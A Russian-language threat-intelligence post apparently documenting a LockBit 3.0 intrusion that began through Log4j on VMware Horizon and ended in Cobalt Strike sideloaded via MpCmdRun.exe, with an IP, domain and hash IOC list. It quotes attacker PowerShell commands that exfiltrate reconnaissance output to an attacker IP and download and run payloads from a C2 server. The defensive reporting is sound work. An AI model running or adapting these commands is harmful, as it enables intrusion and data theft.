LockBit 3.0 Ransomware IOCs - Part 2

security IOC

LockBit Ransomware использовали инструмент командной строки Windows Defender MpCmdRun.exe для расшифровки и загрузки полезной нагрузки Cobalt Strike.

LockBit 3.0 Ransomware

Первоначальная компрометация цели произошла через уязвимость Log4j на непропатченном сервере VMWare Horizon Server. Злоумышленники модифицировали компонент Blast Secure Gateway в приложении, установив веб-оболочку с помощью кода PowerShell, задокументированного здесь.

После получения первоначального доступа злоумышленники выполняли серию команд перечисления и пытались запустить несколько инструментов пост-эксплуатации, включая Meterpreter, PowerShell Empire и новый способ побочной загрузки Cobalt Strike.

В частности, при попытке выполнить Cobalt Strike мы обнаружили новый легитимный инструмент, используемый для побочной загрузки вредоносной DLL, которая расшифровывает полезную нагрузку.

Также были обнаружены ранее замеченные методы обхода защиты путем удаления пользовательских EDR/EPP, Event Tracing for Windows и Antimalware Scan Interface.

После того, как злоумышленники получили первоначальный доступ через уязвимость Log4j, началась разведка с использованием PowerShell для выполнения команд и утечки результатов команд через POST-запрос с кодировкой base64 на IP. Примеры разведывательной деятельности приведены ниже:

powershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII. GetBytes((whoami)))))powershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String(([System.Text.Encoding]::ASCII.GetBytes((nltest /domain_trusts)))))

После получения достаточных привилегий угрожающий агент попытался загрузить и выполнить несколько полезных нагрузок после эксплойта.

Угрожающий агент загружает вредоносную DLL, зашифрованную полезную нагрузку и легитимный инструмент с контролируемого им C2:

powershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/mpclient.dll -OutFile c:\windows\help\windows\mpclient.dll;Invoke-WebRequest -uri http://45.32.108[.]54:443/c0000015. log -OutFile c:\windows\help\windows\c0000015.log;Invoke-WebRequest -uri http://45.32.108[.]54:443/MpCmdRun.exe -OutFile c:\windows\help\windows\MpCmdRun.exe;c:\windows\help\windows\MpCmdRun.exe

Примечательно, что агент угрозы использует легитимный инструмент командной строки Windows Defender MpCmdRun.exe для расшифровки и загрузки полезной нагрузки Cobalt Strike.

Indicators of Compromise

IPv4

  • 149.28.137.7
  • 45.32.108.54
  • 139.180.184.147

Domains

  • info.openjdklab.xyz

SHA1

  • 0815277e12d206c5bbb18fd1ade99bf225ede5db
  • 091b490500b5f827cc8cde41c9a7f68174d11302
  • 10039d5e5ee5710a067c58e76cd8200451e54b55
  • 729eb505c36c08860c4408db7be85d707bdcbf1b
  • 82bd4273fa76f20d51ca514e1070a3369a89313b
  • a512215a000d1b21f92dbef5d8d57a420197d262
  • e35a702db47cb11337f523933acd3bce2f60346d
  • eed31d16d3673199b34b48fb74278df8ec15ae33
  • ff01473073c5460d1e544f5b17cd25dadf9da513
SEC-1275-1
Добавить комментарий